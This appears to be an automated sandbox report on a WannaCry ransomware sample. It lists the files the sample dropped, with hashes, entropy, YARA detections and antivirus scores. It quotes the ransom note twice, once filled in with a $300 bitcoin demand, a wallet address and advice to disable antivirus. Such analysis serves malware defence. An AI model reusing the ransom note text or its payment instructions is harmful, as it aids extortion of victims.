                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):81844
                                                  Entropy (8bit):4.85025787009624
                                                  Encrypted:false
                                                  SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                                  MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                                  SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                                  SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                                  SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):91501
                                                  Entropy (8bit):4.841830504507431
                                                  Encrypted:false
                                                  SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                                  MD5:6735CB43FE44832B061EEB3F5956B099
                                                  SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                                  SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                                  SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):41169
                                                  Entropy (8bit):5.030695296195755
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                                  MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                                  SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                                  SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                                  SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37577
                                                  Entropy (8bit):5.025836823617116
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                                  MD5:FF70CC7C00951084175D12128CE02399
                                                  SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                                  SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                                  SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):39896
                                                  Entropy (8bit):5.048541002474746
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                                  MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                                  SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                                  SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                                  SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37917
                                                  Entropy (8bit):5.027872281764284
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                                  MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                                  SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                                  SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                                  SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):52161
                                                  Entropy (8bit):4.964306949910696
                                                  Encrypted:false
                                                  SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                                  MD5:313E0ECECD24F4FA1504118A11BC7986
                                                  SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                                  SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                                  SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):47108
                                                  Entropy (8bit):4.952777691675008
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                                  MD5:452615DB2336D60AF7E2057481E4CAB5
                                                  SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                                  SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                                  SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):41391
                                                  Entropy (8bit):5.027730966276624
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                                  MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                                  SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                                  SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                                  SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37381
                                                  Entropy (8bit):5.02443306661187
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                                  MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                                  SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                                  SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                                  SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):38483
                                                  Entropy (8bit):5.022972736625151
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                                  MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                                  SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                                  SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                                  SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):42582
                                                  Entropy (8bit):5.010722377068833
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                                  MD5:531BA6B1A5460FC9446946F91CC8C94B
                                                  SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                                  SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                                  SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):93778
                                                  Entropy (8bit):4.76206134900188
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                                  MD5:8419BE28A0DCEC3F55823620922B00FA
                                                  SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                                  SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                                  SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):864
                                                  Entropy (8bit):4.5335184780121995
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                                  MD5:3E0020FC529B1C2A061016DD2469BA96
                                                  SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                                  SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                                  SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                                  Malicious:false
                                                  Yara Hits:
                                                  • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth (Nextron Systems)
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):3038286
                                                  Entropy (8bit):7.998263053003918
                                                  Encrypted:true
                                                  SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                                  MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                                  SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                                  SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                                  SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65816
                                                  Entropy (8bit):7.997276137881339
                                                  Encrypted:true
                                                  SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                                  MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                                  SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                                  SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                                  SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):3.1664845408760636
                                                  Encrypted:false
                                                  SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                                  MD5:4FEF5E34143E646DBF9907C4374276F5
                                                  SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                                  SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                                  SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):2.5252509618107535
                                                  Encrypted:false
                                                  SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                                  MD5:8495400F199AC77853C53B5A3F278F3E
                                                  SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                                  SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                                  SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.78560332413643
                                                  Encrypted:false
                                                  SSDEEP:24:8ea7PVMFJP6LVt6PhAeT/UadfJ18tXwjIYIV8cdnP:8eRP0AhA6p31AXyIBy8P
                                                  MD5:358CA0F1B146F73378A3CCFB206D888F
                                                  SHA1:D3A403B096E28F4C311A221BF94B15A409A90B9D
                                                  SHA-256:92D6A324736291AB667389F4EA5B99A854D01DCA2699630A58DA1DAC6EFA56A5
                                                  SHA-512:802F0BC3009532180684B58C1DC9E896A537F17FE6D06D1692BD84C7F6538F05048DCC392636BF4FD33452025FBC08929CFD9D468459E464BB64F07A8CE3AA39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.863473346449311
                                                  Encrypted:false
                                                  SSDEEP:24:bkgjFIyEbvezZ3Nkk9Y+/lbMbsV2eFXq1fZahMFCXXmZxJ+Zf:bkgFIyET6Z9kk9YaEFwa1BEMgXXQ+
                                                  MD5:54DA137C9ABD3CD2DE9AE9DAC12088EF
                                                  SHA1:F754E204C4AF7EB7F59A394025685ED84EBB211E
                                                  SHA-256:4EB388D0DE69FEBBA6F8213F1E1619B605312EE85B04857CA0D17899B0F6E91B
                                                  SHA-512:95CA3474C6D1ED14F1FB74CA76C980EE4017F7A71159371764ECD0B7D3AF0B32A909D1372B19ED4C4F6504C8300F1656358A4C246BF103160F2DAA214BE89A85
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8068780345827244
                                                  Encrypted:false
                                                  SSDEEP:24:5wI9UP0PdqtSytQ3QLid1u0j8ld5+lh08/t0Ea+X5ucPA/W+6:mCdSSAMUid1u0gld5+bZFBucPYW+6
                                                  MD5:91B16A12E5C2A9061BDDC8BE74720ABE
                                                  SHA1:2FF8B4637DA343CC36CC9E3D8AE65D07B85C423D
                                                  SHA-256:0CD26F9AA88943711EAA14C81EB8C747E6E9881D617DCAFC1CFFE79F1FDBA662
                                                  SHA-512:CF4873FF27B1155A0472D9067DC20F346F111FD7794C3D6A034AE13F1AE25F30243B0EBC8AC80C6C31A5BDFF1A5E5EB0615F083E6039EA6B6307922E42C01433
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.827553224766407
                                                  Encrypted:false
                                                  SSDEEP:24:bkIxRDtbbOspmRGrhkv34k7AsXSd9q9DLZ6oMy5N6E8muaj+261eNNPj:bkI7tbbv2GrcIkHXSd9q9JZ558DW61Cb
                                                  MD5:99EB7AFC07CCA9594CC1A1AB2A301DD0
                                                  SHA1:B2174A332D8AACE16958CD648046A842768CBA33
                                                  SHA-256:74DFC07F7E540EC8B4137AF6C16E7D526FF4D91C6D6274A845A56D3CAD337696
                                                  SHA-512:13419D9481FA051CF4E1E0568455B669E21E09B4B3820DCDE0B2E64E29FFACE0710447C5918697654B2EA4736D69A9C230A1210D2BD5678BCEAECB26647ABA29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.812360612444189
                                                  Encrypted:false
                                                  SSDEEP:24:ysAELyPGiAYTulvoJtwMOTHBuCufS/b8l5:ysAYPiAYTovutwM+0CufS/Yl5
                                                  MD5:F39F139E4AE90FEB41D371FEB063A165
                                                  SHA1:03B8A5414E6E35DFEE373CF5B66B4ADF229208B6
                                                  SHA-256:520E715124CEA418595B0B0C061286A84915497322DE5868B975FA3A8528737F
                                                  SHA-512:5A7B5367E74BA92F1F0959ED1BDA531AAD9657028465CE5D2061F5CA07EFC36C5CA81633D0DD3B6ABEDFE459B52385EA7A73A4A895977794ABFE0662FFEE41F1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854983293082593
                                                  Encrypted:false
                                                  SSDEEP:24:bkxqzQ4FOYF68Wa3kkUEPZiD8g0dcCpt5kMtkIMOY8gQ8CoZLSZ+lhmizquJqKWW:bkxQ6YF68lUkUQiT0dcCbaMtPgbCohSc
                                                  MD5:3BC3E0DEB56C3CF26AD9E25E45388211
                                                  SHA1:B91480215B0F3A028CEEF91A4A46631958B5BFD6
                                                  SHA-256:EE8D2F436B98D25C937D6033CFC4824F6A5B51ECC3A0F571EF39861512974E3C
                                                  SHA-512:8608BFDB0F6ECB8B1753AB8BED481DC151EBAEF7CEF1DC4E2C82AD938756315F3E2112159FD2B344FC417213B42BCD10F3179C66CF00035114F0C8090A0A6CE2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802056296456517
                                                  Encrypted:false
                                                  SSDEEP:24:+kUaPHVl7d2dFm8L8uJLJ0C/QmoL1cB3JgfIdLEsJUgAw:7FPTd2Pm8L/F6qQjcrXLHf
                                                  MD5:E0CB323321AD80AA32657B7049955BF9
                                                  SHA1:237E81047F8114B831ACC7742602E48AD6B8EBB3
                                                  SHA-256:84020FF7F711136C61D7E8881F03819E6BDF6DF4C902B3F77003196AE8D6750F
                                                  SHA-512:18272A555A93BA03010974D17B0499D5422A464439BF30767BFB0366A46D3C32E7DC9AB243841D3A0D94F46E78D2A22B2A7D1E9BE84B92B194AB940292BCBEEE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85323522885903
                                                  Encrypted:false
                                                  SSDEEP:24:bkaSl9IOCWYH0U4PpPf9X20ec6+MQTw0NVYBxlRtlVmoruD5Y58v:bk8L914d9jD6dQE0NGRt9uS5o
                                                  MD5:A680EAA9373DF6DF240A8455ABFEC54D
                                                  SHA1:9F4A489592D65A764A7E32598EE508FACAD0A76E
                                                  SHA-256:9C3614BC83AAEC44CBFCCC16E90DDFF65002D30259B6FA30404196D2DFD35D99
                                                  SHA-512:7D79E95C4EE8BAF966A6B095B1E4CC7EB94AADD69D26B92FE6B9B69B9E354563B8E51BC28C82FAD5E82427A882CDF50C45F3891824BB685A37B7C212FA9D8D19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7944110964953595
                                                  Encrypted:false
                                                  SSDEEP:24:7JQ+xHUrqJTbn32RNj3TP2ePjLk76hO+ev0zWluaREH6:y+x0rMr32RNj3TP2ek78jeszqC6
                                                  MD5:C7889EBC3C299AAEDC9D3C499DFAE58B
                                                  SHA1:91C7664408DD612E9D9AD9446B83B78672F7AABB
                                                  SHA-256:43C75FA9377EAE391949D6F2BD488F96F29EEB17DC4245484CD2C203A4DEBE6B
                                                  SHA-512:825A8AC88421C69CC127868F45289D1D53CD2DA6886199651E778BE2D8F1ED5CB80EF9F2B2E3AD4953A3A1504BBD4ACB228AC5C91F55F5E7DFC4742EADE98DF3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.850093537725532
                                                  Encrypted:false
                                                  SSDEEP:24:bkcLZ/3XCCmyaHLaUnbg0AcdFR/9cK9tKNHkSTdt7J2/4mmk93M:bkQfXFm1raUbgzcdX/5Xq92Mki
                                                  MD5:35D843B632403931DB518807D9873441
                                                  SHA1:E458DC1B10746CA6C89EEB44BB98071AF4632966
                                                  SHA-256:0BB14C59636362E3EB25AD214A61301E24048FFDCF71132FB52133E7498AC86C
                                                  SHA-512:3BF12655BAEF40808E3CE932E285C1E035E839FB71D8918ECEDB96EFAB427B0C95F5D3BC9979849B98810A1954CDFDD00AB0A6290CD9C894FC59934D45AECED6
